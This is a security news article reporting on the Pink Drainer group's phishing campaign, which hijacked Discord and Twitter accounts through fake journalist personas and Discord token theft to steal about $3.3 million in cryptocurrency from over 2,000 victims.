Phishing Campaign Targets Twitter and Discord Accounts to Steal Cryptocurrency
Security researchers have recently uncovered a sophisticated phishing campaign aimed at hijacking Twitter and Discord accounts in order to steal cryptocurrency. The Pink Drainer hacking group has reportedly managed to pilfer over $3 million from more than 2000 victims, including high-profile individuals like OpenAI CTO Mira Murati.
Unusual Social Engineering Tactics
According to Scam Sniffer, who utilized blockchain analysis to identify the Pink Drainer group, the scammers employed unconventional social engineering techniques. They posed as journalists from reputable outlets such as Decrypto and Cointelegraph to establish trust with their targets.
The process typically involved a 1-3 day interaction with the victim, culminating in a KYC authentication request that led to Discord-related phishing activities. By tricking Discord administrators into opening a malicious Carl verification bot and adding bookmarks containing harmful code, the scammers were able to extract the victim’s Discord token.
Method of Attack
Once in possession of the Discord token, the hackers took control of the victim’s account by removing other administrators, elevating their own privileges, and orchestrating infractions that prompted Discord to suspend the account.
As of the latest data, the Pink Drainer group has compromised 2307 victims and siphoned off nearly $3.3 million, with a single individual falling victim to a $300,000 theft.
Rising Discord Account Vulnerabilities
Discord accounts have become a prime target for cybercriminals, with previous incidents involving malicious npm packages aimed at harvesting Discord tokens and financial information. In a separate incident earlier this year, Discord itself was breached when a threat actor gained unauthorized access to a third-party customer service agent’s support ticket queue.
It is essential for users to remain vigilant and exercise caution when interacting with unknown entities online to mitigate the risk of falling victim to such phishing attacks.